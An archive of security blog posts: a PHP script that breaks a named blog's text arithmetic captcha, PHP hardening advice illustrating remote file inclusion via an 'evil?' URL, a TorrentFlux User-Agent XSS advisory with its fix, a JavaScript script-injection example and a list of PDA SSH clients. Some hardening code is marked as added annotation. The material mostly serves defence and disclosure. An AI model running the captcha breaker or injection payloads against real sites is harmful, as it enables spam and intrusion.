Archive for Security

Breaking Text Based Captcha is Easy!

Today, I still don’t remember how I got to this blog post, but anyway I saw that it had a text-based captcha.

The blog author claims that it prevents spam, which it does, because it adds an extra layer of uniqueness to his code that unintelligent spam bots don’t recognise. Anyway, now for the breaking:

<?php
//Break Text Based Captcha:
// Matches a question of the form "<tag/> 3 + 4 =": captures the first operand,
// the operator and the second operand. (The closing "#'" delimiter and the
// semicolon were lost when the post was published; restored here.)
$regex = '#/>\s+(\d+)\s*([\+\-\/\*])\s*(\d+)\s*\=?\s+#';

// getpage() is the author's own curl wrapper (see the note below), not a PHP built-in.
$page = getpage('http://pooteeweet.org/blog/259/p/1');

preg_match($regex, $page, $matches);
$n1 = intval($matches[1]);
$n2 = intval($matches[3]);

$op = $matches[2];

switch ($op) {
case '+':
$INTresult = intval($n1+$n2);
break;

case '-':
$INTresult = intval($n1-$n2);
break;

case '/':
$INTresult = intval($n1/$n2);
break;

case '*':
$INTresult = intval($n1*$n2);
break;

default:
die('Illegal Operation');
break;
}

echo $INTresult;
?>

Note that my framework has a function getpage, which is just a simple (well, quite advanced actually…) curl function.

There you have it: $INTresult is the answer to the math problem.

Yes, this is a very simple text captcha, but breaking a more advanced one wouldn’t require much more effort.

Regards,

Steven Roddis

2 Easy Steps to Increase Security in PHP

I get a lot of questions from people asking how to increase the security of their PHP app.

Aside from the obvious (write secure code), there are two easy “switches that you can flick”.

Disable: URL fopen wrappers

This will prevent most exploitations of the classic File Inclusion Vulnerability.

e.g. include($foo.'bar.php');

Now if $foo is set to ‘http://www.stevenroddis.com/evil?’

the script grabs PHP code from “http://www.stevenroddis.com/evil?bar.php” and executes it.

But if URL fopen wrappers are off, then the hacker can only use files on your server (still with limitations, such as the appended string).

However, there is a downside: some applications use URL wrappers to download data off the web. You can work around it by using curl, but you might not want to.

How?

php.ini (most people won’t have access to this)

allow_url_fopen off

.htaccess

php_flag allow_url_fopen off
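Turning off allow_url_fopen limits the damage, but the include itself is still the bug. The following is an added example (not the blog’s code) that puts the post’s include($foo.'bar.php') pattern next to a hardened version; the module names, the pages/ directory and the function names are assumptions for the illustration, and it assumes PHP 7 or later.

```php
<?php
// Added example (not the blog's code): the include pattern from the post,
// and a hardened version that never uses the request value as a path.

// VULNERABLE: $foo comes straight from the request. With allow_url_fopen on,
// a URL in $foo makes PHP fetch and execute remote code; with it off, an
// attacker is still limited to local files whose names end in bar.php.
function include_page_vulnerable(string $foo): void
{
    include($foo . 'bar.php');
}

// HARDENED: map the user-supplied value to a fixed set of known modules
// (assumed names). The request value is only ever used as an array key.
const PAGE_MODULES = [
    'home'    => 'home_bar.php',
    'contact' => 'contact_bar.php',
];

function include_page_safe(string $foo, string $baseDir = __DIR__ . '/pages'): bool
{
    if (!array_key_exists($foo, PAGE_MODULES)) {
        return false;                       // unknown key: refuse, do not guess
    }
    $root = realpath($baseDir);
    $path = realpath($baseDir . '/' . PAGE_MODULES[$foo]);
    // realpath() resolves symlinks and "../", so this confirms the resolved
    // file really sits inside $baseDir before anything is included.
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $path;
    return true;
}

// Usage: $foo is read from the request, but only allow-listed keys ever resolve.
$foo = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
if (!include_page_safe($foo)) {
    http_response_code(404);
    echo 'Unknown page';
}
```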

Turn Off: Register Globals

Yes, it is off by default but the number of sites that get hacked due to it being on is astounding. Register Globals is not needed in 99.99% of PHP apps.

How?

php.ini (most people won’t have access to this)

register_globals off

.htaccess

php_flag register_globals off

#3 Bonus: Turn off Error Reporting

A lot of sites display error messages containing sensitive information, which can make it easier to find a security hole and/or exploit it.

How?

php.ini (most people won’t have access to this)

display_errors Off

.htaccess

php_flag display_errors Off

Enforce these in your web app:

Don’t let stupid configuration changes bring down your defences: inside your PHP application, make sure you die() and give some [nice] error when, say, register globals is turned back on.

Code:

if (@ini_get('register_globals'))
{
die();
}

You might want to do it also for allow_url_fopen (replace “register_globals” in the above with “allow_url_fopen”).
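One caveat a practitioner will hit with the check above: ini_get() returns the configured value as a string, so a directive written as php_value register_globals off comes back as "off", which is a non-empty (and therefore truthy) string. The following is an added example (not the blog’s code) that applies the check to all three settings from this post while handling that case; the function names are assumptions, and it assumes PHP 7 or later.

```php
<?php
// Added example (not the blog's code): a startup self-check for the three
// settings discussed in the post. FILTER_VALIDATE_BOOLEAN treats
// "off", "0", "", "no" and "false" as false and "on", "1", "yes", "true" as true,
// which avoids the truthy-"off" trap of testing ini_get()'s raw string directly.
function ini_flag_is_on(string $name): bool
{
    $raw = @ini_get($name);
    if ($raw === false) {
        // Directive unknown to this PHP build (register_globals was removed
        // in PHP 5.4, for example): it cannot be on, so treat it as off.
        return false;
    }
    return filter_var($raw, FILTER_VALIDATE_BOOLEAN);
}

// Returns the names of the dangerous settings that are currently enabled.
function dangerous_settings_enabled(): array
{
    $mustBeOff = ['register_globals', 'allow_url_fopen', 'display_errors'];
    return array_values(array_filter($mustBeOff, 'ini_flag_is_on'));
}

// Call this before anything else in the app. It fails closed with a plain
// message and logs the detail server-side rather than showing it to visitors
// (showing it would itself be the kind of information leak the post warns about).
function enforce_hardened_config(): void
{
    $bad = dangerous_settings_enabled();
    if ($bad !== []) {
        error_log('Refusing to run: unsafe php.ini settings enabled: ' . implode(', ', $bad));
        http_response_code(503);
        die('Site temporarily unavailable.');
    }
}

enforce_hardened_config();
```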

There you have it two (well four) easy and simple steps to greatly increase security in your PHP application. (Three of them don’t require changing your code)

Regards,

Steven Roddis

TorrentFlux User-Agent XSS Vulnerability

Name: TorrentFlux User-Agent XSS Vulnerability
Published: 2006-10-06
Critical Level: Moderate
Type: Cross-Site Scripting
Where: Remote
Status: 0-Day
Software: Torrentflux 2.1
Discoverer: Steven Roddis (http://www.stevenroddis.com)

I gave the authors of this product a week (more than usual) just to contact me; they have failed to do so, so I am releasing this vulnerability publicly!

/admin.php

Line: 325

$ip_info = $ip_resolved."
".$user_agent;

The User-Agent header is not escaped before it is output.

Solution:

Edit source code:

/admin.php

Line: 325:

$ip_info = htmlentities($ip_resolved, ENT_QUOTES)."
".htmlentities($user_agent, ENT_QUOTES);

Back; Well… yeah, back!

After not being bothered to update my weblog for a while, I have decided to update it…

I have moved everything to a different server and enabled caching, which will mean much faster page loading!

So what is in store?

Hacks, cracks and exploits (well, hacks and exploits). Only the legal stuff, such as laser audio transmitters and the like (old-school hacking). As for exploits, I have a policy of notifying the producers of the flawed product; if they don’t respond or don’t fix it in enough time (e.g. file inclusion = ~3 days), then the exploit gets released publicly. If the author of the product genuinely needs more time, then upon assessment they may be given it. So you will only see an exploit here after the conditions above are met.

Regards,
Steven Roddis

A fix for a flaw in most Javascripts.

N.B. This is to fix the Client Side stuff, NOT server side things.

Problem:

Consider this:

<script type="text/javascript">

<!--

var text = '<script>alert(\'Boo!\');</script>';

document.write(text);

-->

</script>

See the problem: any input, however it is obtained (e.g. a form), isn’t converted into text but is left as HTML, so document.write() renders it as markup.

Yes, I know that this doesn’t pose a great security risk as the client has to type it in, however that is no excuse!

SSH Clients for your PDA

How many times have I been around a WiFi spot and wanted to remotely administer a computer but only had my PDA with me?

Well, too many times, so I searched around for some free pocket SSH clients, and I also included a VNC viewer for PDAs too.

PocketPutty (http://pocketputty.duxy.net)

This SSH Client doesn’t require installation on your pocket pc and can be run straight away. It supports SSH1/SSH2 and Telnet. It also has a compression option that helps conserve bandwidth.

OpenSSH CE (http://www.eskimo.com/~webguy/service/openssh.html)

OpenSSH CE doesn’t require installation either, but it does require the user to configure it (PuTTY doesn’t). OpenSSH CE does support secure file transfer, whereas PuTTY doesn’t.

Putty = Fast Setup
OpenSSH CE = More Things

VNC Viewer for Pocket PC (http://www.cs.utah.edu/~midgley/wince/vnc.html)

Works on:

* PocketPC 2000 [ARM] [MIPS] [SH3]
* PocketPC 2002 [ARM]
* PocketPC 2003 [ARM]

Steven
